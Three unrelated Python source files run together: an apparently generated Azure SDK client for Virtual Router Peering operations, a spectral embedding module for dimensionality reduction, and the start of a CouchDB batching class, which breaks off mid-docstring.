                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    def get(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.VirtualRouterPeering"
        """Gets the specified Virtual Router Peering.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_router_name: The name of the Virtual Router.
        :type virtual_router_name: str
        :param peering_name: The name of the Virtual Router Peering.
        :type peering_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualRouterPeering, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"
        accept = "application/json"
        # Construct URL
        url = self.get.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    def update(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        parameters, # type: "_models.VirtualRouterPeering"
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.VirtualRouterPeering"
        """Updates a Virtual Router Peering.
        :param resource_group_name: The resource group name of the Virtual Router Peering.
        :type resource_group_name: str
        :param virtual_router_name: The name of the Virtual Router.
        :type virtual_router_name: str
        :param peering_name: The name of the Virtual Router Peering being updated.
        :type peering_name: str
        :param parameters: Parameters supplied to update Virtual Router Peering operation.
        :type parameters: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualRouterPeering, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.update.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {} # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
        body_content_kwargs['content'] = body_content
        # PATCH: partial, non-LRO update that returns the updated resource.
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    # Internal: performs the initial PUT request of the long-running
    # create-or-update; begin_create_or_update() wraps it with a poller.
    def _create_or_update_initial(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        parameters, # type: "_models.VirtualRouterPeering"
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.VirtualRouterPeering"
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._create_or_update_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {} # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # 200 (updated) and 201 (created) both carry the peering body.
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    def begin_create_or_update(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        parameters, # type: "_models.VirtualRouterPeering"
        **kwargs # type: Any
    ):
        # type: (...) -> LROPoller["_models.VirtualRouterPeering"]
        """Creates or updates the specified Virtual Router Peering.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_router_name: The name of the Virtual Router.
        :type virtual_router_name: str
        :param peering_name: The name of the Virtual Router Peering.
        :type peering_name: str
        :param parameters: Parameters supplied to the create or update Virtual Router Peering
         operation.
        :type parameters: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling.
        Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                virtual_router_name=virtual_router_name,
                peering_name=peering_name,
                parameters=parameters,
                # Pass the raw PipelineResponse through so the poller can
                # inspect it; the user-supplied cls is applied on output.
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        # This LRO reports completion via the Azure-AsyncOperation header.
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    def list(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
        """Lists all Virtual Router Peerings in a Virtual Router resource.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_router_name: The name of the Virtual Router.
        :type virtual_router_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeeringListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url'] # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                # next_link already embeds all query parameters.
                query_parameters = {} # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.Error, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
|
|
"""Spectral Embedding"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# Wei LI <kuantkid@gmail.com>
# License: BSD Style.
import warnings
import numpy as np
from scipy import sparse
from scipy.sparse.linalg import lobpcg
from scipy.sparse.linalg.eigen.lobpcg.lobpcg import symeig
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..utils import check_random_state
from ..utils.validation import atleast2d_or_csr
from ..utils.graph import graph_laplacian
from ..utils._csgraph import cs_graph_components
from ..utils.arpack import eigsh
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph
def _graph_connected_component(graph, node_id):
"""Find the largest graph connected components the contains one
given node
Parameters
----------
graph : array-like, shape: (n_samples, n_samples)
adjacency matrix of the graph, non-zero weight means an edge
between the nodes
node_id : int
The index of the query node of the graph
Returns
-------
connected_components : array-like, shape: (n_samples,)
An array of bool value indicates the indexes of the nodes
belong to the largest connected components of the given query
node
"""
connected_components = np.zeros(shape=(graph.shape[0]), dtype=np.bool)
connected_components[node_id] = True
n_node = graph.shape[0]
for i in range(n_node):
last_num_component = connected_components.sum()
_, node_to_add = np.where(graph[connected_components] != 0)
connected_components[node_to_add] = True
if last_num_component >= connected_components.sum():
break
return connected_components
def _graph_is_connected(graph):
    """ Return whether the graph is connected (True) or Not (False)

    Parameters
    ----------
    graph : array-like or sparse matrix, shape: (n_samples, n_samples)
        adjacency matrix of the graph, non-zero weight means an edge
        between the nodes

    Returns
    -------
    is_connected : bool
        True means the graph is fully connected and False means not
    """
    if sparse.isspmatrix(graph):
        # Sparse input: count the connected components directly.
        n_components, _ = cs_graph_components(graph)
        return n_components == 1
    # Dense input: the graph is connected iff the component that
    # contains node 0 spans every node.
    component = _graph_connected_component(graph, 0)
    return component.sum() == graph.shape[0]
def _set_diag(laplacian, value):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition
Parameters
----------
laplacian : array or sparse matrix
The graph laplacian
value : float
The value of the diagonal
Returns
-------
laplacian : array or sparse matrix
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
# We need all entries in the diagonal to values
if not sparse.isspmatrix(laplacian):
laplacian.flat[::n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
diag_idx = (laplacian.row == laplacian.col)
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices comming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
def spectral_embedding(adjacency, n_components=8, eigen_solver=None,
                       random_state=None, eigen_tol=0.0,
                       norm_laplacian=True, drop_first=True,
                       mode=None):
    """Project the sample on the first eigen vectors of the graph Laplacian.

    The adjacency matrix is used to compute a normalized graph Laplacian
    whose spectrum (especially the eigen vectors associated to the
    smallest eigen values) has an interpretation in terms of minimal
    number of cuts necessary to split the graph into comparably sized
    components.

    This embedding can also 'work' even if the ``adjacency`` variable is
    not strictly the adjacency matrix of a graph but more generally
    an affinity or similarity matrix between samples (for instance the
    heat kernel of a euclidean distance matrix or a k-NN matrix).

    However care must taken to always make the affinity matrix symmetric
    so that the eigen vector decomposition works as expected.

    Parameters
    ----------
    adjacency : array-like or sparse matrix, shape: (n_samples, n_samples)
        The adjacency matrix of the graph to embed.

    n_components : integer, optional
        The dimension of the projection subspace.

    eigen_solver : {None, 'arpack', 'lobpcg', or 'amg'}
        The eigenvalue decomposition strategy to use. AMG requires pyamg
        to be installed. It can be faster on very large, sparse problems,
        but may also lead to instabilities.

    random_state : int seed, RandomState instance, or None (default)
        A pseudo random number generator used for the initialization of the
        lobpcg eigen vectors decomposition when eigen_solver == 'amg'.
        By default, arpack is used.

    eigen_tol : float, optional, default=0.0
        Stopping criterion for eigendecomposition of the Laplacian matrix
        when using arpack eigen_solver.

    norm_laplacian : bool, optional, default=True
        If True, use the symmetric normalized graph Laplacian instead of
        the unnormalized one.

    drop_first : bool, optional, default=True
        Whether to drop the first eigenvector. For spectral embedding, this
        should be True as the first eigenvector should be constant vector for
        connected graph, but for spectral clustering, this should be kept as
        False to retain the first eigenvector.

    mode : deprecated
        Old name for ``eigen_solver``; emits a DeprecationWarning and will
        be removed in 0.15.

    Returns
    -------
    embedding : array, shape=(n_samples, n_components)
        The reduced samples.

    Notes
    -----
    Spectral embedding is most useful when the graph has one connected
    component. If there graph has many components, the first few eigenvectors
    will simply uncover the connected components of the graph.

    References
    ----------
    * http://en.wikipedia.org/wiki/LOBPCG

    * Toward the Optimal Preconditioned Eigensolver: Locally Optimal
      Block Preconditioned Conjugate Gradient Method
      Andrew V. Knyazev
      http://dx.doi.org/10.1137%2FS1064827500366124
    """
    try:
        from pyamg import smoothed_aggregation_solver
    except ImportError:
        # pyamg is only mandatory when the caller explicitly asked for it.
        if eigen_solver == "amg" or mode == "amg":
            raise ValueError("The eigen_solver was set to 'amg', but pyamg is "
                             "not available.")

    if mode is not None:
        warnings.warn("'mode' was renamed to eigen_solver "
                      "and will be removed in 0.15.",
                      DeprecationWarning)
        eigen_solver = mode

    if eigen_solver is None:
        eigen_solver = 'arpack'
    elif eigen_solver not in ('arpack', 'lobpcg', 'amg'):
        raise ValueError("Unknown value for eigen_solver: '%s'."
                         "Should be 'amg', 'arpack', or 'lobpcg'"
                         % eigen_solver)

    random_state = check_random_state(random_state)

    n_nodes = adjacency.shape[0]
    # Whether to drop the first eigenvector: ask the solver for one extra
    # component so we can discard the constant eigenvector afterwards.
    if drop_first:
        n_components = n_components + 1

    # Check that the matrices given is symmetric; symmetrize by averaging
    # with the transpose when it is not (with a warning).
    if ((not sparse.isspmatrix(adjacency) and
         not np.all((adjacency - adjacency.T) < 1e-10)) or
        (sparse.isspmatrix(adjacency) and
         (adjacency - adjacency.T).nnz > 0)):
        warnings.warn("Graph adjacency matrix should be symmetric. "
                      "Converted to be symmetric by average with its "
                      "transpose.")
        adjacency = .5 * (adjacency + adjacency.T)

    if not _graph_is_connected(adjacency):
        warnings.warn("Graph is not fully connected, spectral embedding"
                      " may not works as expected.")

    laplacian, dd = graph_laplacian(adjacency,
                                    normed=norm_laplacian, return_diag=True)
    if (eigen_solver == 'arpack'
        or eigen_solver != 'lobpcg' and
            (not sparse.isspmatrix(laplacian)
             or n_nodes < 5 * n_components)):
        # lobpcg used with eigen_solver='amg' has bugs for low number of nodes
        # for details see the source code in scipy:
        # https://github.com/scipy/scipy/blob/v0.11.0/scipy/sparse/linalg/eigen
        # /lobpcg/lobpcg.py#L237
        # or matlab:
        # http://www.mathworks.com/matlabcentral/fileexchange/48-lobpcg-m
        laplacian = _set_diag(laplacian, 1)

        # Here we'll use shift-invert mode for fast eigenvalues
        # (see http://docs.scipy.org/doc/scipy/reference/tutorial/arpack.html
        #  for a short explanation of what this means)
        # Because the normalized Laplacian has eigenvalues between 0 and 2,
        # I - L has eigenvalues between -1 and 1.  ARPACK is most efficient
        # when finding eigenvalues of largest magnitude (keyword which='LM')
        # and when these eigenvalues are very large compared to the rest.
        # For very large, very sparse graphs, I - L can have many, many
        # eigenvalues very near 1.0.  This leads to slow convergence.  So
        # instead, we'll use ARPACK's shift-invert mode, asking for the
        # eigenvalues near 1.0.  This effectively spreads-out the spectrum
        # near 1.0 and leads to much faster convergence: potentially an
        # orders-of-magnitude speedup over simply using keyword which='LA'
        # in standard mode.
        try:
            lambdas, diffusion_map = eigsh(-laplacian, k=n_components,
                                           sigma=1.0, which='LM',
                                           tol=eigen_tol)
            embedding = diffusion_map.T[n_components::-1] * dd
        except RuntimeError:
            # When submatrices are exactly singular, an LU decomposition
            # in arpack fails. We fallback to lobpcg
            eigen_solver = "lobpcg"

    if eigen_solver == 'amg':
        # Use AMG to get a preconditioner and speed up the eigenvalue
        # problem.
        if not sparse.issparse(laplacian):
            warnings.warn("AMG works better for sparse matrices")
        # lobpcg needs native floats (np.float was an alias for builtin float
        # and has been removed from recent NumPy releases)
        laplacian = laplacian.astype(float)
        laplacian = _set_diag(laplacian, 1)
        ml = smoothed_aggregation_solver(atleast2d_or_csr(laplacian))
        M = ml.aspreconditioner()
        X = random_state.rand(laplacian.shape[0], n_components + 1)
        X[:, 0] = dd.ravel()
        lambdas, diffusion_map = lobpcg(laplacian, X, M=M, tol=1.e-12,
                                        largest=False)
        embedding = diffusion_map.T * dd
        if embedding.shape[0] == 1:
            raise ValueError

    elif eigen_solver == "lobpcg":
        laplacian = laplacian.astype(float)  # lobpcg needs native floats
        if n_nodes < 5 * n_components + 1:
            # see note above under arpack why lobpcg has problems with small
            # number of nodes
            # lobpcg will fallback to symeig, so we short circuit it
            if sparse.isspmatrix(laplacian):
                laplacian = laplacian.todense()
            lambdas, diffusion_map = symeig(laplacian)
            embedding = diffusion_map.T[:n_components] * dd
        else:
            # lobpcg needs native floats
            laplacian = laplacian.astype(float)
            laplacian = _set_diag(laplacian, 1)
            # We increase the number of eigenvectors requested, as lobpcg
            # doesn't behave well in low dimension
            X = random_state.rand(laplacian.shape[0], n_components + 1)
            X[:, 0] = dd.ravel()
            lambdas, diffusion_map = lobpcg(laplacian, X, tol=1e-15,
                                            largest=False, maxiter=2000)
            embedding = diffusion_map.T[:n_components] * dd
            if embedding.shape[0] == 1:
                raise ValueError

    if drop_first:
        return embedding[1:n_components].T
    else:
        return embedding[:n_components].T
class SpectralEmbedding(BaseEstimator, TransformerMixin):
    """Spectral Embedding for Non-linear Dimensionality Reduction.

    Forms an affinity matrix given by the specified function and
    applies spectral decomposition to the corresponding graph laplacian.
    The resulting transformation is given by the value of the
    eigenvectors for each data point.

    Parameters
    -----------
    n_components : integer, default: 2
        The dimension of the projected subspace.

    eigen_solver : {None, 'arpack', 'lobpcg', or 'amg'}
        The eigenvalue decomposition strategy to use. AMG requires pyamg
        to be installed. It can be faster on very large, sparse problems,
        but may also lead to instabilities.

    random_state : int seed, RandomState instance, or None, default : None
        A pseudo random number generator used for the initialization of the
        lobpcg eigen vectors decomposition when eigen_solver == 'amg'.

    affinity : string or callable, default : "nearest_neighbors"
        How to construct the affinity matrix.
         - 'nearest_neighbors' : construct affinity matrix by knn graph
         - 'rbf' : construct affinity matrix by rbf kernel
         - 'precomputed' : interpret X as precomputed affinity matrix
         - callable : use passed in function as affinity
           the function takes in data matrix (n_samples, n_features)
           and return affinity matrix (n_samples, n_samples).

    gamma : float, optional, default : 1/n_features
        Kernel coefficient for rbf kernel.

    n_neighbors : int, default : max(n_samples/10 , 1)
        Number of nearest neighbors for nearest_neighbors graph building.

    Attributes
    ----------
    `embedding_` : array, shape = (n_samples, n_components)
        Spectral embedding of the training matrix.

    `affinity_matrix_` : array, shape = (n_samples, n_samples)
        Affinity_matrix constructed from samples or precomputed.

    References
    ----------
    - A Tutorial on Spectral Clustering, 2007
      Ulrike von Luxburg
      http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323

    - On Spectral Clustering: Analysis and an algorithm, 2011
      Andrew Y. Ng, Michael I. Jordan, Yair Weiss
      http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.19.8100

    - Normalized cuts and image segmentation, 2000
      Jianbo Shi, Jitendra Malik
      http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
    """

    def __init__(self, n_components=2, affinity="nearest_neighbors",
                 gamma=None, random_state=None, eigen_solver=None,
                 n_neighbors=None):
        # Parameters are stored untouched; validation happens in fit().
        self.n_components = n_components
        self.affinity = affinity
        self.gamma = gamma
        self.random_state = random_state
        self.eigen_solver = eigen_solver
        self.n_neighbors = n_neighbors

    @property
    def _pairwise(self):
        # Signals that X is a square samples-by-samples matrix (an affinity
        # matrix) rather than a feature matrix when affinity='precomputed'.
        return self.affinity == "precomputed"

    def _get_affinity_matrix(self, X, Y=None):
        """Calculate the affinity matrix from data
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training vector, where n_samples in the number of samples
            and n_features is the number of features.

            If affinity is "precomputed"
            X : array-like, shape (n_samples, n_samples),
            Interpret X as precomputed adjacency graph computed from
            samples.

        Returns
        -------
        affinity_matrix, shape (n_samples, n_samples)
        """
        if self.affinity == 'precomputed':
            # X is already the affinity matrix; store it as-is.
            self.affinity_matrix_ = X
            return self.affinity_matrix_
        if self.affinity == 'nearest_neighbors':
            if sparse.issparse(X):
                warnings.warn("Nearest neighbors affinity currently does "
                              "not support sparse input, falling back to "
                              "rbf affinity")
                # NOTE(review): this mutates the user-supplied ``affinity``
                # parameter in place and falls through to the rbf branch
                # below — confirm the in-place mutation is intended.
                self.affinity = "rbf"
            else:
                self.n_neighbors_ = (self.n_neighbors
                                     if self.n_neighbors is not None
                                     else max(int(X.shape[0] / 10), 1))
                self.affinity_matrix_ = kneighbors_graph(X, self.n_neighbors_)
                # currently only symmetric affinity_matrix supported
                self.affinity_matrix_ = 0.5 * (self.affinity_matrix_ +
                                               self.affinity_matrix_.T)
                return self.affinity_matrix_
        if self.affinity == 'rbf':
            # Default bandwidth 1/n_features when gamma was not provided.
            self.gamma_ = (self.gamma
                           if self.gamma is not None else 1.0 / X.shape[1])
            self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma_)
            return self.affinity_matrix_
        # Otherwise affinity is a user-provided callable.
        self.affinity_matrix_ = self.affinity(X)
        return self.affinity_matrix_

    def fit(self, X, y=None):
        """Fit the model from data in X.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training vector, where n_samples in the number of samples
            and n_features is the number of features.

            If affinity is "precomputed"
            X : array-like, shape (n_samples, n_samples),
            Interpret X as precomputed adjacency graph computed from
            samples.

        Returns
        -------
        self : object
            Returns the instance itself.

        Raises
        ------
        ValueError
            If ``affinity`` is neither a recognized string nor a callable.
        """
        random_state = check_random_state(self.random_state)
        if isinstance(self.affinity, six.string_types):
            if self.affinity not in set(("nearest_neighbors", "rbf",
                                         "precomputed")):
                raise ValueError(("%s is not a valid affinity. Expected "
                                  "'precomputed', 'rbf', 'nearest_neighbors' "
                                  "or a callable.") % self.affinity)
        elif not hasattr(self.affinity, "__call__"):
            raise ValueError(("'affinity' is expected to be an an affinity "
                              "name or a callable. Got: %s") % self.affinity)
        affinity_matrix = self._get_affinity_matrix(X)
        self.embedding_ = spectral_embedding(affinity_matrix,
                                             n_components=self.n_components,
                                             eigen_solver=self.eigen_solver,
                                             random_state=random_state)
        return self

    def fit_transform(self, X, y=None):
        """Fit the model from data in X and transform X.

        Parameters
        ----------
        X: array-like, shape (n_samples, n_features)
            Training vector, where n_samples in the number of samples
            and n_features is the number of features.

            If affinity is "precomputed"
            X : array-like, shape (n_samples, n_samples),
            Interpret X as precomputed adjacency graph computed from
            samples.

        Returns
        -------
        X_new: array-like, shape (n_samples, n_components)
        """
        self.fit(X)
        return self.embedding_
|
|
"""This is the core of our couch wrapper. The CouchBatch class defined here
is what end-users can use to efficiently query and update couchdb.
"""
from couchdbkit.exceptions import ResourceConflict
from couchdbkit.exceptions import ResourceNotFound
from couchdbkit.exceptions import BulkSaveError
from functools import partial
from pprint import pprint as pp
import copy
import time
from .exceptions import ActionForbidsDocument
from .exceptions import ActionNeedsDocument
from .exceptions import CreateScheduled
from .exceptions import UpdateScheduled
from .exceptions import OverwriteScheduled
from .exceptions import DeleteScheduled
from .promise import Promise
from .result import DbFailure
from .result import DbValue
from .actions import ReadAction
from .actions import CreateAction
from .actions import OverwriteAction
from .actions import UpdateAction
from .actions import DeleteAction
from .view import ViewResults
class CouchBatch(object):
    """An efficient job batcher for CouchDB. All the database-access functions
    of this class (.get, .create, .overwrite, .update, and .delete) return a
    promise object without accessing the database. When that promise object's
    value() method is called, all the accumulated work that the batch has been
    given will ideally be sent to the database in a single operation. Sometimes
    reads and retries will be necessary, but this still tends to be more
    efficient than doing a ton of reads and writes in the sane ordering that a
    programmer wants to use.

    Since we batch operations for efficiency, actions on the same key may cause
    conflicts. Rather than coming up with creative and disturbing ways for
    operations on a single key to interact without touching the database, I've
    implemented the more sane optimizations and defined errors for the rest of
